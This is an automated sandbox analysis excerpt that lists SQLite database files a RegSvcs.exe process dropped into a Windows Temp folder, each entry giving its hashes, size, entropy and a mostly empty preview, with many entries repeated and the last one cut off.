C:\Users\user\AppData\Local\Temp\tmp6A94.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3046000, page size 2048, file counter 6, database pages 68, cookie 0x4a, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	139264
Entropy (8bit):	1.1366509594298093
Encrypted:	false
SSDEEP:	192:+lsfoVZkNi61n1ulH5eJpX6Nq4wOVuaaDPqfPk:+lsfoQx1n1ulH5683wOVuaaDPqfM
MD5:	C5CFBCA422AD1353E7116A02424C59FD
SHA1:	38F032839FC5E1F890FAA636390A3CC9556AD350
SHA-256:	F0BFA28378F9311F7EED68314B9476296522994570F3C7B4567AB71857CAC546
SHA-512:	94463562E57B9D42995A55C24E403E6DA2EFD56C0C8EB0DAAF9C5D6D2BC85981717A2D89E92E8F492A409F1BFE1406BA5F1B559AC3457CB4353D227D1954C84B
Malicious:	false
Preview:	SQLite format 3......@ .......D...........J......................................................zp...........<........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp6AB4.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3046000, page size 2048, file counter 6, database pages 68, cookie 0x4a, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	139264
Entropy (8bit):	1.1366509594298093
Encrypted:	false
SSDEEP:	192:+lsfoVZkNi61n1ulH5eJpX6Nq4wOVuaaDPqfPk:+lsfoQx1n1ulH5683wOVuaaDPqfM
MD5:	C5CFBCA422AD1353E7116A02424C59FD
SHA1:	38F032839FC5E1F890FAA636390A3CC9556AD350
SHA-256:	F0BFA28378F9311F7EED68314B9476296522994570F3C7B4567AB71857CAC546
SHA-512:	94463562E57B9D42995A55C24E403E6DA2EFD56C0C8EB0DAAF9C5D6D2BC85981717A2D89E92E8F492A409F1BFE1406BA5F1B559AC3457CB4353D227D1954C84B
Malicious:	false
Preview:	SQLite format 3......@ .......D...........J......................................................zp...........<........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp6AC5.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3046000, page size 2048, file counter 6, database pages 68, cookie 0x4a, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	139264
Entropy (8bit):	1.1366509594298093
Encrypted:	false
SSDEEP:	192:+lsfoVZkNi61n1ulH5eJpX6Nq4wOVuaaDPqfPk:+lsfoQx1n1ulH5683wOVuaaDPqfM
MD5:	C5CFBCA422AD1353E7116A02424C59FD
SHA1:	38F032839FC5E1F890FAA636390A3CC9556AD350
SHA-256:	F0BFA28378F9311F7EED68314B9476296522994570F3C7B4567AB71857CAC546
SHA-512:	94463562E57B9D42995A55C24E403E6DA2EFD56C0C8EB0DAAF9C5D6D2BC85981717A2D89E92E8F492A409F1BFE1406BA5F1B559AC3457CB4353D227D1954C84B
Malicious:	false
Preview:	SQLite format 3......@ .......D...........J......................................................zp...........<........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp6AD5.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3046000, page size 2048, file counter 6, database pages 68, cookie 0x4a, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	139264
Entropy (8bit):	1.1366509594298093
Encrypted:	false
SSDEEP:	192:+lsfoVZkNi61n1ulH5eJpX6Nq4wOVuaaDPqfPk:+lsfoQx1n1ulH5683wOVuaaDPqfM
MD5:	C5CFBCA422AD1353E7116A02424C59FD
SHA1:	38F032839FC5E1F890FAA636390A3CC9556AD350
SHA-256:	F0BFA28378F9311F7EED68314B9476296522994570F3C7B4567AB71857CAC546
SHA-512:	94463562E57B9D42995A55C24E403E6DA2EFD56C0C8EB0DAAF9C5D6D2BC85981717A2D89E92E8F492A409F1BFE1406BA5F1B559AC3457CB4353D227D1954C84B
Malicious:	false
Preview:	SQLite format 3......@ .......D...........J......................................................zp...........<........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp6AE6.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3046000, page size 2048, file counter 6, database pages 68, cookie 0x4a, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	139264
Entropy (8bit):	1.1366509594298093
Encrypted:	false
SSDEEP:	192:+lsfoVZkNi61n1ulH5eJpX6Nq4wOVuaaDPqfPk:+lsfoQx1n1ulH5683wOVuaaDPqfM
MD5:	C5CFBCA422AD1353E7116A02424C59FD
SHA1:	38F032839FC5E1F890FAA636390A3CC9556AD350
SHA-256:	F0BFA28378F9311F7EED68314B9476296522994570F3C7B4567AB71857CAC546
SHA-512:	94463562E57B9D42995A55C24E403E6DA2EFD56C0C8EB0DAAF9C5D6D2BC85981717A2D89E92E8F492A409F1BFE1406BA5F1B559AC3457CB4353D227D1954C84B
Malicious:	false
Preview:	SQLite format 3......@ .......D...........J......................................................zp...........<........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp6AF7.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3046000, page size 2048, file counter 6, database pages 68, cookie 0x4a, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	139264
Entropy (8bit):	1.1366509594298093
Encrypted:	false
SSDEEP:	192:+lsfoVZkNi61n1ulH5eJpX6Nq4wOVuaaDPqfPk:+lsfoQx1n1ulH5683wOVuaaDPqfM
MD5:	C5CFBCA422AD1353E7116A02424C59FD
SHA1:	38F032839FC5E1F890FAA636390A3CC9556AD350
SHA-256:	F0BFA28378F9311F7EED68314B9476296522994570F3C7B4567AB71857CAC546
SHA-512:	94463562E57B9D42995A55C24E403E6DA2EFD56C0C8EB0DAAF9C5D6D2BC85981717A2D89E92E8F492A409F1BFE1406BA5F1B559AC3457CB4353D227D1954C84B
Malicious:	false
Preview:	SQLite format 3......@ .......D...........J......................................................zp...........<........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA13A.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3046000, page size 2048, file counter 6, database pages 68, cookie 0x4a, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	139264
Entropy (8bit):	1.1366509594298093
Encrypted:	false
SSDEEP:	192:+lsfoVZkNi61n1ulH5eJpX6Nq4wOVuaaDPqfPk:+lsfoQx1n1ulH5683wOVuaaDPqfM
MD5:	C5CFBCA422AD1353E7116A02424C59FD
SHA1:	38F032839FC5E1F890FAA636390A3CC9556AD350
SHA-256:	F0BFA28378F9311F7EED68314B9476296522994570F3C7B4567AB71857CAC546
SHA-512:	94463562E57B9D42995A55C24E403E6DA2EFD56C0C8EB0DAAF9C5D6D2BC85981717A2D89E92E8F492A409F1BFE1406BA5F1B559AC3457CB4353D227D1954C84B
Malicious:	false
Preview:	SQLite format 3......@ .......D...........J......................................................zp...........<........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA13B.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3046000, page size 2048, file counter 6, database pages 68, cookie 0x4a, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	139264
Entropy (8bit):	1.1366509594298093
Encrypted:	false
SSDEEP:	192:+lsfoVZkNi61n1ulH5eJpX6Nq4wOVuaaDPqfPk:+lsfoQx1n1ulH5683wOVuaaDPqfM
MD5:	C5CFBCA422AD1353E7116A02424C59FD
SHA1:	38F032839FC5E1F890FAA636390A3CC9556AD350
SHA-256:	F0BFA28378F9311F7EED68314B9476296522994570F3C7B4567AB71857CAC546
SHA-512:	94463562E57B9D42995A55C24E403E6DA2EFD56C0C8EB0DAAF9C5D6D2BC85981717A2D89E92E8F492A409F1BFE1406BA5F1B559AC3457CB4353D227D1954C84B
Malicious:	false
Preview:	SQLite format 3......@ .......D...........J......................................................zp...........<........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA14C.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3046000, page size 2048, file counter 6, database pages 68, cookie 0x4a, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	139264
Entropy (8bit):	1.1366509594298093
Encrypted:	false
SSDEEP:	192:+lsfoVZkNi61n1ulH5eJpX6Nq4wOVuaaDPqfPk:+lsfoQx1n1ulH5683wOVuaaDPqfM
MD5:	C5CFBCA422AD1353E7116A02424C59FD
SHA1:	38F032839FC5E1F890FAA636390A3CC9556AD350
SHA-256:	F0BFA28378F9311F7EED68314B9476296522994570F3C7B4567AB71857CAC546
SHA-512:	94463562E57B9D42995A55C24E403E6DA2EFD56C0C8EB0DAAF9C5D6D2BC85981717A2D89E92E8F492A409F1BFE1406BA5F1B559AC3457CB4353D227D1954C84B
Malicious:	false
Preview:	SQLite format 3......@ .......D...........J......................................................zp...........<........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA15C.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3046000, page size 2048, file counter 6, database pages 68, cookie 0x4a, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	139264
Entropy (8bit):	1.1366509594298093
Encrypted:	false
SSDEEP:	192:+lsfoVZkNi61n1ulH5eJpX6Nq4wOVuaaDPqfPk:+lsfoQx1n1ulH5683wOVuaaDPqfM
MD5:	C5CFBCA422AD1353E7116A02424C59FD
SHA1:	38F032839FC5E1F890FAA636390A3CC9556AD350
SHA-256:	F0BFA28378F9311F7EED68314B9476296522994570F3C7B4567AB71857CAC546
SHA-512:	94463562E57B9D42995A55C24E403E6DA2EFD56C0C8EB0DAAF9C5D6D2BC85981717A2D89E92E8F492A409F1BFE1406BA5F1B559AC3457CB4353D227D1954C84B
Malicious:	false
Preview:	SQLite format 3......@ .......D...........J......................................................zp...........<........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA16D.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA17E.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA17F.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA18F.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA1A0.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA1B1.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpD42.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpD62.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpD63.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpD777.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpD788.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpD7A8.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpD7B9.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpD7D9.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpD83.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpD94.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpDA5.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
